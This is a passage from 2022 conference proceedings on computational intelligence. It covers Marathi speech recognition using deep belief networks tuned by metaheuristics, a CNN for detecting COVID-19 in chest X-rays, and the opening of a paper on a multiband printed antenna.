cations and Networking, 10(2), A286–A297. https://doi.org/10.1364/JOCN.10.00A286
37. De Miguel, I., et al. (2013). Cognitive dynamic optical networks. In Optical Fiber Communi-
cations Conference and Exposition OFC 2013 (pp. 18–20). https://doi.org/10.1364/ofc.2013.
ow1h.1.
38. Aladin, S., & Tremblay, C. (2018). Cognitive tool for estimating the QoT of new lightpaths.
In 2018 Optical Fiber Communications Conference and Exposition OFC 2018— Proceedings
(Vol. 3, pp. 1–3, 2018). https://doi.org/10.1364/ofc.2018.m3a.3.
39. Shahkarami, S., Musumeci, F., Cugini, F., & Tornatore, M. (2018). Machine-learning-based
soft-failure detection and identification in optical networks. In Optical InfoBase Conference
Papers (Vol. Part F84-O, pp. 37–39). https://doi.org/10.1364/OFC.2018.M3A.5.
Duo Features with
Hybrid-Meta-Heuristic-Deep Belief
Network Based Pattern Recognition for
Marathi Speech Recognition

Ravindra P. Bachate, Ashok Sharma, and Amar Singh

Abstract Marathi speech recognition is challenging due to the many dialects, vari-
ability in pronunciation, and the limited size of speech corpus available for developing
a speech recognition system. This work addresses the critical issues in developing
a speech recognition system for the Marathi Language. The paper evaluates various
approaches for feature extraction and pattern recognition and proposes optimized
methods for feature extraction and pattern recognition of the Marathi language.
Evaluation is classified into two parts—Feature Extraction Techniques and Pattern
Recognition Techniques. In feature extraction, MFCC and spectral features are eval-
uated, and their results are compared for analysis purposes using six measures. In
pattern recognition, DBN is optimized with different techniques such as WOA, GWO,
CBBO, and ROA and analyzed using six performance measure parameters. Finally,
the duo feature hybrid algorithm for feature extraction and new pattern recognition
approach RCBO-DBN has been proposed, and its performance is compared with
earlier techniques.

Keywords Deep belief network · Feature extraction · MFCC · Pattern


recognition · Spectral features

1 Introduction

The speech recognition system is an application of natural language processing. It is


gaining popularity and full acceptance due to the dramatic growth in technology and
its usage. The speech recognition systems can be developed using various approaches

R. P. Bachate (B) · A. Sharma


School of Computer Science and Engineering, Lovely Professional University, Phagwara,
Jalandhar, Punjab, India
A. Singh
School of Computer Application, Lovely Professional University, Phagwara, Jalandhar, Punjab,
India
e-mail: amar.23318@lpu.co.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 665
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_53
666 R. P. Bachate et al.

such as the traditional HMM-GMM approach, deep learning approach, and hybrid
approach. Each method has it is own pros and cons in different circumstances. The
languages have spoken by most people in the world benefits from the availability of
a large speech corpus for building a speech recognition system. On the other hand,
languages that belong to a small geographical region or spoken by a small group of
people concerning the population of the world get lesser attention for developing a
speech recognition system. More than 9.5 crore people from India speak the Marathi
language [1]. The Marathi language has a total of 42 dialects spread across mainly
in Maharashtra state and the remaining part of India. Scarce research is done until
now about developing a speech recognition system for the Marathi language.
Deep belief network is a stack of restricted Boltzmann machines (RBMs) consist-
ing of two layers isible layer and hidden layer inside each RBM layer. Unlike deep
neural networks, each layer of RBM learns all the input. The hidden layer of one
layer becomes a visible layer in its next RBM. “An RBM is an undirected energy-
based model with two layers of visible (v) and hidden (h) units, respectively, with
connections only between layers. RBM has two biases—(a) Hidden layer biases that
are used for a forward pass and (b) Visible layer bias that is used for the backward
pass. Each RBM module is trained one at a time in an unsupervised manner and
using contrastive divergence procedure” [2]. RBM is suitable for many applications
such as regression, feature learning, dimensionality reduction, etc. The performance
of DBN depends on the three parameters—(i) number of hidden units, (ii) number of
layers, (iii) number of iterations [3]. The performance of DBN flattens after reach-
ing the threshold number of hidden units. If the number of hidden layers increases,
the performance of DBN is affected badly. But the performance of DBN can be
increased by increasing the training iterations of RBM. The total energy of RBM
with the hidden layer (h) and visible layer (v) is denoted in Eq. (1)


b
B Z E(ca ) = nsa Ba,b + βa (1)
a

This paper is arranged as per the below-mentioned manner: The related work of
existing speech recognition methodologies in Sect. 2. Duo features with Hybrid-
Meta-Heuristic based deep belief network is discussed in Sect. 3. Experimental setup,
Results and performance analysis of various pattern recognition algorithms is spec-
ified in Sect. 4. At last, the conclusion and future scope of the paper is mentioned in
Sect. 5.

2 Related Work

Natural language processing and understanding play an essential role in transforming


technology at a different level. “Today’s world is data-driven, and we must work on
techniques that will improve the living standard of the human being. If we want to
Duo Features with Hybrid-Meta-Heuristic-Deep Belief … 667

make their life better using NLP, we need to work on regional languages like Marathi,
Hindi, Punjabi, and so on” [4]. Supriya et al. [5] have implemented a Marathi Auto-
matic Speech Recognition System using HMM and DNN. The dataset used for this
implementation is having a size of 15,000 speech files and different 1500 speak-
ers. The proposed system has been implemented using the Kaldi ASR toolkit and
achieved a 24% word error rate. A text corpus of 340 sentences also used, while
performing. Five models—Mono, Tri1, Tri2, Tri3, and SGMM—have been used in
the system for the comparative study purpose, and SGMM gives a better result com-
pared to other models. Kishori et al. [6] have proposed a Marathi ASR system for
isolated words using neural network. The speech corpus used for the implementation
is 100 words of 100 different speakers with three utterances of each word discrete
wavelet transform (DWT) algorithm used in this paper for the feature extraction. For
pattern recognition, artificial neural network (ANN) has been used, which gave 60%
accuracy. Lokesh et al. [7] have come up with bi-directional Recurrent Neural Net-
work for building Tamil automatic speech recognition system. The SGF algorithm
is used for the speech data pre-processing. Feature extraction has been implemented
using MAR and PLP algorithms, and BRNN is used as a classifier. Different classifi-
cation algorithms such as BRNN-SOM, RNN, and DNN-HMM were implemented
and analyzed for the performance measurement. The proposed system has achieved
the 93.6% accuracy, which is better compared to other classifiers. Sangramsingh [8]
implemented Marathi speech recognition using the HTK toolkit. Here, MFCC is
used for the feature extraction and HMM for the classification purpose. With this,
5.37% of Word Error Rate and 94.63% of accuracy is achieved. The dataset used for
the implementation purpose is minimal, i.e., 30 words and eight different speakers.
Puneet et al. [9] developed a Punjabi ASR system for mobile phones. The MFCC
algorithm is used for feature extraction, and the GMM is used as a pattern recogni-
tion technique. The 6.34 h speech corpus data set has been used, having 48 distinct
speakers.This speech corpus contains 1275 words. The system gives the highest
accuracy for a higher level of GMM, i.e., 64. The GMM-CD Untied gave the highest
accuracy of 81.2%. Ravindra and Ashok [10] discussed various approaches used for
pattern recognition. In this paper, building speech recognition system performance
of different classifiers is discussed, such as KNN, SVM, NN, DNN, and DBN. After
implementing and analyzing the results of these algorithms, it is found that DBN
gives better results as compared to other classifier algorithms.
668 R. P. Bachate et al.

3 Duo Features with Hybrid-Meta-Heuristic-Based Deep


Belief Network

3.1 Optimization Techniques Used for Deep Belief Network

3.1.1 Grey Wolf Optimizer

The Grey Wolf Optimizer algorithm is proposed by Mirjalili et al. [11] in 2016. The
design of this algorithm is based on the nature scenario, i.e., survival of fittest. The
organisms in nature evolve with heredity, selection, and mutation. There are changes
in the searching process of wolves based on heredity, selection, and mutation. There
are four phases of wolves hunting –(i)searching for prey, (ii)encircling prey, (iii)
hunting, and (iv) attacking target [12]. “After each iteration of the algorithm sort the
fitness value that corresponds to each wolf by ascending order, and then eliminate R
wolves with worst fitness value, meanwhile randomly generate wolves equal to the
number of eliminated wolves”.

3.1.2 Whale Optimization Algorithm

The inspiration to design the Whale Optimization Algorithm is taken from Whale
fish, which is the biggest mammal in the world. The whale has seven different species
in which humpback is considered here to design the Whale Optimization Algorithm.
The unique behavior of bubble-net feeding, which is observed only in humpback
whales, is used to develop the algorithm [12]. This algorithm has involved three
phases—(i) Encircling prey, (ii) Bubble-net attacking, and (iii) Search for prey.
“WOA is a simple, robust, and swarm-based stochastic optimization algorithm.
Population-based WOA can avoid local optima and get a globally optimal solution”
[13].

3.1.3 Chaotic Biogeography Based Optimization

The Chaotic Biogeography based optimization (CBBO) algorithm is inspired by


biogeography. “The BBO algorithm mimics relationships between different species
(habitants) located in different habitats in terms of immigration, emigration, and
mutation.” [14]. The habitat suitability index (HBI) of each habitat is calculated to
determine the survival of that habitat in the biogeography location. The high HBI
index indicates high suitability for habitants to live, and more species can reside
there. Whereas the low index indicates the low suitability for habitants to live there,
and fewer species can survive in that habitat.
Duo Features with Hybrid-Meta-Heuristic-Deep Belief … 669

3.1.4 Rider Optimization Algorithm

The Rider Optimization Algorithm (ROA) is inspired by the group of Riders who
wants to reach its target location and become a winner [15]. There are four types of
Riders—(i) Bypass Rider, (ii) Follower, (iii) Overtaker, and (iv) Attacker. Each rider
has its nature and strategy to reach the destination. The bypass rider skips the leading
path to reach the destination. In simple words, it does not follow the leading rider
and choose its path by own. The follower group of riders supports the leading rider.
The overtaker rider follows his path concerning leading rider to reach the destination.
The attacker rider is a type of rider that uses the maximum speech to reach a target
location. ROA algorithm is used for obtaining the optimal weights in the neural
network.

3.2 Proposed Architecture

The proposed Duo features with hybrid meta heuristic-based deep belief network is
divided into three parts—Speech corpus pre-processing by implementing smoothing
technique, feature extraction using duo features, which is a new proposed feature
extraction methodology, and the classification that has been implemented with new
proposed hybrid algorithm RCBO-DBN. The proposed model is shown in Fig. 1.

3.3 Duo-Feature Feature Extraction Technique

The feature extraction phase plays a vital role in the speech recognition system.
Because, the performance of the classifier depends on the accuracy and qual-

Fig. 1 Proposed duo features with hybrid-meta-heuristic-based deep belief network


670 R. P. Bachate et al.

ity of features extracted from speech signals as it is an input to the classifier.


The original speech corpus is divided into two parts –training speech corpus
(80%) and testing speech corpus (20%). It then passed to three feature extraction
algorithms—(a) MFCC, (b) Spectral features, and (c) Duo feature extraction algo-
rithm MFCC+Spectral features. It is then passed to the DBN classifier and compared
to the results. The proposed duo-feature is a combination of 14 MFCC features and
26 spectral features that helps to improve the accuracy and quality of features used
for the classification.

3.4 RCBO-DBN Pattern Recognition

The proposed RCBO is a combination of the Rider Optimization Algorithm (ROA)


and Chaotic Biogeography-based Optimization (CBBO) algorithm. Each of these two
algorithms is good in one aspect while working with the neural network. The ROA
algorithm is best suitable for obtaining the optimal weights for Hidden Neurons and
Visible Neurons. On the other hand, CBBO is best suitable for the classification based
on the habitat suitability index (HBI). So, for developing the proposed optimization
algorithm RCBO for deep belief network, the strength of the algorithm is considered
and used at an appropriate place.

4 Results and Discussion

4.1 Experimental Setup

The evaluation of different feature extraction and pattern recognition approaches


for Marathi speech recognition was implemented using python. The Marathi speech
corpus used for the experimentation was taken from the Indian Language Technology
Proliferation and Development Center, Government of India. The speech corpus
contains around 44,500 speech files with its pronunciation. The total speech corpus
is divided into six parts for easy computation. The batch size used for the training
was 32, and RBM epochs were 10. The performance of proposed algorithms was
compared with conventional algorithms such as MFCC, Spectral features, WOA,
GOA, ROA, and CBBO. The analysis has considered performance measures such as
accuracy, NPV, precision, FPR, FNR, and FDR.
Duo Features with Hybrid-Meta-Heuristic-Deep Belief … 671

Table 1 Performance analysis of pattern recognition techniques


Algorithms Accuracy Precision NPV FPR FNR FDR
MFCC 70.94 6.35 70.37 29.62 1.54 93.65
Spectral 69.06 5.94 68.48 31.51 2.43 94.06
features
Proposed 83.12 10.51 82.79 17.21 0.97 89.49

4.2 Performance Analysis of Feature Extraction Techniques

The performance analysis of proposed MFCC-Spectral Features and the conventional


techniques MFCC and Spectral features for feature extraction is shown in Table 1.
The proposed duo-feature gives improvement in accuracy around 12% than MFCC
and around 13% than Spectral features at an 85% learning percentage. Compare to the
conventional feature extraction methods; the proposed Duo-feature gives advance-
ment of 4% to MFCC and 5% to spectral features. The another positive measure
used here for performance analysis is NPV. The NPV results of the proposed feature
extraction technique are are surprisingly bad with respect to MFCC and Spectral
features. The proposed technique gives an underperformance of 10% compared to
conventional methods. The first negative measure considered here is the FPR. The
values for FPR performance analysis for all techniques are given in Table 1. The
another negative measure considered here is the FNR which gives the betterment
in the result of around 0.5% than MFCC and 1.5% than Spectral features. The last
negative measure used here for performance analysis is FDR. The FDR results are
bad with respect to MFCC and Spectral features. The proposed technique gives an
underperformance of 10% compared to conventional methods.

4.3 Performance Analysis of Pattern Recognition Techniques

The results of various optimized-DBN and proposed RCBO are given in Table 2. The
first positive measure used for analysis is accuracy. The proposed algorithm gives
an accuracy of 71.5%, which is higher than 2.11% than GWO-DBN, 8.84% than
WOA-DBN, 8.46% than CBBO-DBN, and 9.82% than ROA-DBN. The precision
values of proposed optimized DBN give advancement of 0.22 % than GWO-DBN,
1.22% than WOA-DBN, 1.1% than CBBO-DBN, and 1.28% than ROA-DBN. The
Negative Predictive Value is another positive measure used for performance analy-
sis. The RCBO-DBN performs well compare to conventional optimized algorithms
and give advancement of 0.41% than GWO-DBN, 7.27% than WOA-DBN, 6.91%
than CBBO-DBN, and 8.29% than ROA-DBN. The first negative measure consid-
ered here is the FPR, whose values are mentioned in Table 2. It gives betterment in
around 0.41% than GWO-DBN, 7.27% than WOA-DBN, 6.91% than CBBO-DBN,
672 R. P. Bachate et al.

Table 2 Performance analysis of pattern recognition techniques


Algorithms Accuracy Precision NPV FPR FNR FDR
GWO-DBN 69.39 5.95 68.82 31.17 3.24 93.65
WOA-DBN 62.66 4.95 61.96 38.03 2.83 95.04
CBBO- 63.04 5.07 62.32 37.68 1.35 93.22
DBN
ROA-DBN 61.68 4.889 60.94 39.05 1.62 94.37
RCBO- 71.50 6.17 69.23 30.76 0.81 92.68
DBN

and 8.29% than ROA-DBN. Another negative measure used here for performance
analysis is FNR. The FNR results of the proposed feature extraction technique are
given in Table 2. The results are good with respect to other conventional optimized
algorithms. The proposed technique provides an advancement with of 2.43% than
GWO-DBN, 2.02% than WOA-DBN, 0.54% than CBBO-DBN, and 0.81% than
ROA-DBN. The last negative measure used here for performance analysis is FDR.
The proposed approach provides an advancement with 0.97% than GWO-DBN,
2.36% than WOA-DBN, 0.54% than CBBO-DBN, and 1.69% than ROA-DBN.

5 Conclusion

This paper has proposed a novel approach feature extraction and pattern recognition
for Marathi speech recognition system. For the experiment purpose, studied related
work in the speech domain for Marathi as well as other Indic and non-Indic languages.
Here, the optimal features were selected by using a proposed duo-feature feature
extraction technique. After performance analysis, it was observed that duo-feature
performs better with the advantage of 12.7% than MFCC and 13% than Spectral
features. The pattern recognition has been achieved with proposed RCBO-DBN and
other conventional optimized DBN techniques. The proposed optimization technique
gives the advantage of 2.11% than GWO-DBN, 8.84% than WOA-DBN, 8.46% than
CBBO-DBN, and 9.82% than ROA-DBN.The future work focuses on implementing
RNN, LSTM, and comparing the results with proposed RCBO-DBN.

References

1. Eberhard, C. D. F., & David M., Simons, G. F. Ethnologue: Languages of the World. SIL
International. [Online]. Available: https://www.ethnologue.com/language/mar.
2. Morabito, F. C., Campolo, M., Ieracitano, C., & Mammone, N. (2018). Deep learning
approaches to electrophysiological multivariate time-series analysis. Elsevier Inc.
Duo Features with Hybrid-Meta-Heuristic-Deep Belief … 673

3. Salama, M. A., Hassanien, A. E., & Fahmy, A. A. (2011). Deep belief network for clustering and
classification of a continuous data. In 10th IEEE International Symposium on Signal Processing
and Information Technology, p. 24.
4. Bachate, R. P. & Sharma, A. (2020). Acquaintance with natural language processing for building
smart society. In E3S Web Conference, 170, 02006.
5. Paulose, S. Nath, S. & Samudravijaya, K. (2018). Marathi speech recognition. In The 6th
International Workshop on Spoken Language Technologies for Under-Resourced Languages
29-31 August 2018 (Vol. August, pp. 235–238). Gurugram, India .
6. Ghule, K. R., & Deshmukh, R. R. (2015). Automatic speech recognition of marathi isolated
words using neural network, 6(5), 4296–4298.
7. Lokesh, S., Malarvizhi Kumar, P., Ramya Devi, M., Parthasarathy, P., & Gokulnath, C. (2019).
An automatic tamil speech recognition system by using bidirectional recurrent neural network
with self-organizing map. Neural Computing and Applications, 31(5), 1521–1531.
8. Sangramsing, K. (2015, December). Marathi speech recognition system using hidden markov
model toolkit. Concurrent Engineering Research and Applications, 5(12).
9. Mittal, P., & Singh, N. (2019). Development and analysis of Punjabi ASR system for mobile
phones under different acoustic models. International Journal of Speech Technology, 22(1),
219–230.
10. Bachate, R. P., & Sharma, A. (2020). Comparing different pattern recognition approaches of
building Marathi ASR system. International Journal of Advanced Science and Technology,
29(5), 4615–4623.
11. Pradhan, M., Roy, P. K., & Pal, T. (2018). Oppositional based grey wolf optimization algorithm
for economic dispatch problem of power system. Ain Shams Engineering Journal, 9(4), 2015–
2025.
12. Mirjalili, S., & Lewis, A. (2016). The whale optimization algorithm. Advances in Engineering
Software, 95, 51–67.
13. Nasiri, J., & Khiyabani, F. M. (2018). A whale optimization algorithm (WOA) approach for
clustering. Cogent Mathematics and Statistics, 5(1), 1–13.
14. Saremi, S., Mirjalili, S., & Lewis, A. (2014). Biogeography-based optimization with chaos.
Neural Computing and Applications, 25(5), 1077–1097.
15. Binu, D., & Kariyappa, B. S. (2019). RideNN: A new rider optimization algorithm-based
neural network for fault diagnosis in analog circuits. IEEE Transactions on Instrumentation
and Measurement, 68(1), 2–26.
Computer-Aided Diagnostic
of COVID-19 Using Chest X-Ray
Analysis

Mangala Shetty and Spoorthi Shetty

Abstract Coronavirus disease, 2019 (COVID-19) is highly contagious. Chest X-


ray (CXR) became the first clinical tool to examine the infection of COVID-19. The
progress in the pandemic state of coronavirus makes the entire medical world to
rely upon CXR because of its ubiquity and decreased difficulties in the detection
of diseases. Most of the chest diseases are curable if observed in the beginning
stages. CXR examination is a time-consuming medical procedure that relies on the
practitioners’ level of experience. In some instances, medical professionals ignore
the illness in the first CXR tests, and during re-examination, disease symptoms may
be identified. In this paper, a classification task is carried out with the input of
CXR images, and the classification results are declared as COVID-19 positive or
COVID-19 negative using deep learning approach.

Keywords Chest X-ray (CXR) · Coronavirus disease · COVID-19 · Deep


learning · Computer-aided diagnostic (CAD)

1 Introduction

The COVID-19 infectious disease that has spread in more than 210 countries and
destroyed greater lives is becoming pandemic. The COVID-19 pandemic had taken a
massive toll on people all over the globe. The risk of pneumonia suffered by patients
with COVID-19 is immense for many, especially in age groups above sixty and people
suffers from other diseases. Coronaviruses are essential pathogenic to humans and
animals. At present, the novel COVID-19 is growing at an alarming rate all over the
world and poses a threat to the survival of billions of humans. While chest CT is said
to be a successful imaging procedure for the treatment of lung-related illness, chest

M. Shetty (B) · S. Shetty


Department of MCA, NMAM Institute of Technology, Nitte, Karkala, India
e-mail: mangalapshetty@nitte.edu.in
S. Shetty
e-mail: sshetty.07@nitte.edu.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 675
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_54
676 M. Shetty and S. Shetty

X-ray is popular more commonly due to its shorter imaging time and significantly less
costly than CT. Deep learning, one of the most common AI methods, is an excellent
means of tools and algorithms to improve human life. Detection of disorders through
X-ray images is a problem that needs a better solution. In fact, the number of CXRs
to be investigated is vast, and well beyond the ability of medical staff, particularly in
developing countries. A computer-aided diagnostic program will mark prospective
areas on CXR for doctors to closely inspect and alert in situations where immediate
treatment is required. One of the main tasks in developing CAD functionality is to
detect and identify disease from CXRs automatically. Helping radiologists to examine
the massive quantities of X-ray images which would be crucial to successful and
accurate COVID-19 examination. The primary aim of technology is to develop tools
and algorithms to improve human life. Detection of disorders through X-ray images
is a problem that needs a better solution. The number of CXRs to be investigated is
vast, and well beyond the ability of medical staff, particularly in developing countries.
A computer-aided diagnostic (CAD) program will mark prospective areas on CXR
for doctors to closely inspect and alert in situations where immediate treatment is
required. The key aim of the proposed experiment is to increase the efficiency and
performance of the duty of radiologists by developing a computational framework
for the identification and classification of COVID-19 diseases. Our studies were
centered on a collection of chest X-ray images named metadata.csv collected at the
University of Montreal by Dr Joseph Cohen postdoctoral fellow [1]. Experimental
findings indicate that the system built here can accurately detect 98.00% COVID-19
cases.

2 Survey of Literature

A technique implemented to reduce false positives by discovering the similarity


among the right and left lungs. We implemented our segmentation algorithm based
on the active shape model algorithm. Deep learning could be applied in a diverse range
of fields, such as the identification of tumors and lesions in biological images [2, 3]. In
automated health related data analysis computer related therapies are extensively used
[4–6]. Determining multifocal air-space disorder on CXR could be a relevant sign
of COVID-19 pneumonia [7]. For several applications, the accuracy of automated
detection and diagnostic systems based on machine learning (ML) has been proven to
be competitive to that of both a skilled and professional radiologist thus ML becoming
an efficient way to automate medical data processing and evaluation, especially CXRs
[8]. ML leads toward CAD growth. In addition, deep learning was researched and
proven to be the most effective ML model for biomedical image analysis [3, 9, 10].
Therefore, ML leads to developing CAD. In addition, deep learning was researched
and proven to be the most effective ML model for biomedical image analysis [11].
Our contribution the method presented in this work has two distinct innovations
which distinguish it from previous work:
Computer-Aided Diagnostic of COVID-19 Using Chest X-Ray Analysis 677

1. We present a diagnosis method based on finding the underlying structure of the


chest. Given the anatomical structure presented in a radio-graph, we are able
to better simulate the decision process employed by the doctors, allowing for
better classification results.
2. Our method is based on supervised machine learning, the labels can be adapted
to match the requested pathology. The feature extraction will assign greater
weights to pixels which best distinguish the labels.

3 Proposed System

We constructed a system with high-reliability accuracy for detecting and classifying


digital chest X-rays of coronavirus suspected patients. The proposed method initially
converts X-ray images of the chest into small-sized compared to the source. The
architecture diagram for the proposed method is as shown in Fig. 3. In Fig. 1, normal
chest X-rays are shown, and in Fig. 2, COVID-19 effected patient’s chest X-rays are
shown. Images are defined and categorized by the convolutionary neural network
system in the second step, which selects the image characteristics and categorizes
the images. Because of the strength of qualified CNN setup to distinguish normal and
COVID-19 effected chest X-Rays, our system’s validation precision was dramatically
better relative to other methods. To validate the model’s accuracy, we replicated the
model’s training cycle many times, with the same findings were notices each time. In
this experiment, exhaustive studies and evaluation measures are carried out in order
to check the efficacy of the new methodology.
From Dr Joseph Cohen dataset, all the rows are selected for COVID-19 ignoring
MERS, SARS, and ARDS. To develop and train the convolutionary neural network
model, Keras open-source deep learning platform with tensor-flow backend [8] is
configured. The main dataset includes three categories of data (training, testing,
and validation) and two subcategories containing COVID-19 positive and COVID-
19 negative sample X-ray image collection from Kaggle chest X-ray database of
healthy persons, respectively. Thus, one hundred twenty images in the dataset are
ready for the experiment. Chest X-ray images were carefully selected from patients
between the ages of 25 and 87. In accordance with the data ratio for training and

Fig. 1 Normal (chest X-ray images)


678 M. Shetty and S. Shetty

Fig. 2 COVID-19 effected (chest X-ray images)

Fig. 3 Proposed architecture

validation, the original data category was changed. We just reorganized all of the data
into training and validation collection. The training set was assigned 80% images,
and the test set was given 20% images to boost evaluation accuracy. We used many
methods of data enhancement to artificially increase dataset size, and efficiency is
method helps solve overfitting issues and increases the potential to generalize the
system while training. The framework given in Figure 3 is composed of the combined
layers of classification, convolution, and max-pooling. The extractors of the feature
Computer-Aided Diagnostic of COVID-19 Using Chest X-Ray Analysis 679

include conv 3 × 3, 32, conv 3 × 3, 64, conv 3 × 3, 128, conv 3 × 3, 128, max-
pooling layer of size 2 × 2, and a ReLU activator between them. The performance
of the convolution and max-pooling activities is organized into 2D planes named
feature maps, and we got 208 × 208 × 32, 102 × 102 × 62, 49 × 49 × 128, and
22 × 22 × 128 sizes of feature maps, for the convolution operations and 104 ×
104 × 32, 51 × 51 × 64, 24 × 24 × 128 and 11 × 11 × 128 sizes of feature
maps obtained through pooling operation, respectively, with an input of image of
size 224 × 224 × 3. It is worth noting that every plane of a level in the network was
achieved by combining one or several previous level planes. The classifier is located
toward the far side of the proposed system of the convolution neural network (CNN).
This is essentially an artificial neural network (ANN) and is also called a dense
layer. This classifier uses specific feature variables (vectors) as any other classifier
to conduct classification. So, the extracted features (CNN part) for the classifiers
are transformed into a one-dimensional vector function. This system is termed as
flattening, in which result obtained from convolution function is flattened to produce
one long characteristic function for use in the final classification process by the dense
layer. Main components of the classification layer are a dropout od size 0.5, two dense
layers, a flattened layer, a RELU between the two dense layers and a sigmoid to do
the activation task which does the classification work.

4 Results and Discussion

To determine and confirm the feasibility of the recommended method, we performed


the tests 10 times per hour continuously three times. Parameters and hyperparameters
have been extensively turned to improve system efficiency. Several findings have been
extracted, but only the most credible findings from this analysis are reported. The
final results obtained are training loss of 0.1191%, training accuracy of 0.9642%,
validation loss of 0.2325%, and validation accuracy of 0.8964%. In preparation,
CNN systems often need images of the set sizes. To illustrate our system’s validation
accuracy over variant data taken as input. X-ray images are resized to 100 × 100 ×
3, 150 × 150 × 3, 224 × 224 × 3, 250 × 250 × 3 and 300 × 300 × 3. Figure 4 and
Table 1 depict the average output achieved after 3 hours of training.
As the number of the transformed image increases, validation precision decreases.
Conversely, a smaller set of training images lead to a marginal increase in validity
precision. Consequently, the small glitches in the accuracy of the validation do not
indicate a significant effect on the final classification results of the proposed systems.
Larger images often needed more training and cost of processing, and the results of
150 × 150 × 3 and 100 × 100 × 3 image sizes were identical. By varying the
sizes of the learning and evaluation database to test the outcomes obtained from
the trained system is performed on various image dimensions of chest X-ray. As a
result, fairly comparable outcomes are obtained. This experiment will go a big step
toward saving the lives of people. Data deficiency is the limitation for the COVID-19
disease analysis. Valuable progress can be made with improved access to data and
680 M. Shetty and S. Shetty

Fig. 4 Performance of classification model on 224 × 224 × 3 data size

Table 1 Performance of the proposed architecture


Performance of the classification model on different data sizes
Data size Training accuracy Validation accuracy
100 0.9266 0.9155
150 0.9361 0.9242
224 0.9642 0.9434
250 0.9472 0.9396
300 0.9518 0.9366

pattern testing for radiological evidence from COVID-19 positive people and non-
COVID-19 people in various places around the globe. For every patient, the dataset
includes details such as age, location, physicians’ remarks. So, the results of the
classification analyzed with the help of dataset and results are in good agreement with
dataset information. We have obtained 99.00% sensitivity and 80.00% specificity.
These results imply that COVID-19 is identified accurately, but non-COVID-19 cases
accuracy is 80.00% given in Table 1, and the graph shows training and validation
accuracy and loss. Since the true negative rate is not satisfactory, we will overcome
this in our future research with a large dataset.

5 Conclusion

We have shown how a series of chest X-ray images will recognize positive COVID-
19 results. We are performing this experiment from scratch, which distinguishes it
from the processes which depend strongly on transfer learning. This research is to
Computer-Aided Diagnostic of COVID-19 Using Chest X-Ray Analysis 681

be expanded in future to identify and classify COVID-19 images present in the large
X-ray image dataset. Differentiating X-ray pictures which shows COVID-19 related
pneumonia and non-COVID-19 pneumonia has been a big issue. Our next approach
will tackle this problem.

References

1. Cohen, J. P., Morrison, P., Dao, L., Roth, K., Duong, T. Q., & Ghassemi, M. (2020). Covid-
19 image data collection: Prospective pre-dictions are the future. arXiv preprint arXiv:2006.
11988.
2. Brunetti, A., Carnimeo, L., Trotta, G. F., & Bevilacqua, V. (2019). Computer-assisted frame-
works for classification of liver, breast and blood neoplasias via neural networks: A survey
based on medical images. Neurocomputing, 335, 274–298.
3. Litjens, G., Kooi, T., Bejnordi, B. E., Setio, A. A. A., Ciompi, F., Ghafoorian, M., Van Der
Laak, J. A., Van Ginneken, B., & Sánchez, C. I. (2017). A survey on deep learning in medical
image analysis. Medical Image Analysis, 42, 60–88.
4. Asiri, N., Hussain, M., Al Adel, F., & Alzaidi, N. (2019). Deep learning based computer-aided
diagnosis systems for diabetic retinopathy-a survey. Artificial Intelligence in Medicine.
5. Zhou, T., Thung, K.-H., Zhu, X., & Shen, D. (2019). Effective feature learning and fusion
of multimodality data using stage-wise deep neural network for dementia diagnosis. Human
Brain Mapping, 40(3), 1001–1016. https://doi.org/10.1002/hbm.24428
6. Shickel, B., Tighe, P. J., Bihorac, A., & Rashidi, P. (2017). Deep EHR: a survey of recent
advances in deep learning techniques for electronic health record (EHR) analysis. IEEE Journal
of Biomedical and Health Informatics, 22(5), 1589–1604. https://doi.org/10.1109/JBHI.2017.
2767063 arXiv:1706.03446.
7. Jacobi, A., Chung, M., Bernheim, A., & Eber, C. (2020). Portable chest x-ray in coronavirus
disease-19 (covid-19): A pictorial review. Clinical Imaging.
8. Wang, S., & Summers, R. M. (2012). Machine learning and radiology. Medical Image Analysis,
16(5), 933–951.
9. Ker, J., Wang, L., Rao, J., & Lim, T. (2017). Deep learning applications in medical image
analysis. IEEE Access, 6, 9375–9389.
10. Mittal, A., Hooda, R., & Sofat, S. (2017). Lung field segmentation in chest radiographs: A
historical review, current status, and expectations from deep learning. IET Image Processing,
11, 937–952. https://doi.org/10.1049/iet-ipr.2016.0526
11. Bar, Y., Diamant, I., Wolf, L., Lieberman, S., Konen, E., & Greenspan, H. (2018). Chest
pathology identification using deep feature selection with non-medical training. Computer
Methods in Biomechanics and Biomedical Engineering: Imaging & Visualization, 6(3), 259–
263.
Low Cost Compact Multiband Printed
Antenna for Wireless Communication
Systems

Rachna Prabha, Pratibha Pandey, G. S. Tripathi, and Sudhanshu Verma

Abstract The proposed approach aims to design the compact multiband printed
antenna for in applications of wireless communication. The basic aim of the design
of this antenna is to achieve wide bandwidth, less weight, and decreased size which
reduces cost as well. The structure includes a main radiator, two sub-patches, and
the ground plane which generates bands at 1.25, 1.75, 2.45, 3.95, 5.1 GHz with
multiple frequency that have bandwidth of 45, 68, 112, 127, 240 kHz, respectively.
The defected ground structure (DGS) has been used for the improvement of the
parameters of proposed antenna. The simulated and fabricated result exhibits good
reflection coefficient, radiation pattern, and stable gain so this antenna is applicable
for DCS/Bluetooth /WLAN/WiMAX/IMT bands. This proposed antenna is designed
and analyzed using Ansys HFSS 11.2 for high frequency structure simulation tool.
The method used to fabricate simulated antenna, and this photolithographic and
vector network analyzer are used to measure the fabricated result. The proposed
antenna shows the better consensus between both the results. The proposed antenna
works at the multiple frequency which varies from bands from 1.25 to 5.1 GHz for
the Bluetooth system, 2.12–2.45 GHz for the WLAN systems, 3.45–3.95 GHz for
the WiMAX system, and 4.95–5.1 GHz for the IMT system.

Keywords Multiband · Wideband antenna · Wireless communication application ·


Slots

R. Prabha · G. S. Tripathi · S. Verma


Department of Electronics and Communication Engineering, Madan Mohan Malaviya University
of Technology, Gorakhpur, India
P. Pandey (B)
Department of Computer Science and Engineering, Institute of Engineering and Technology,
Lucknow, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 683
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
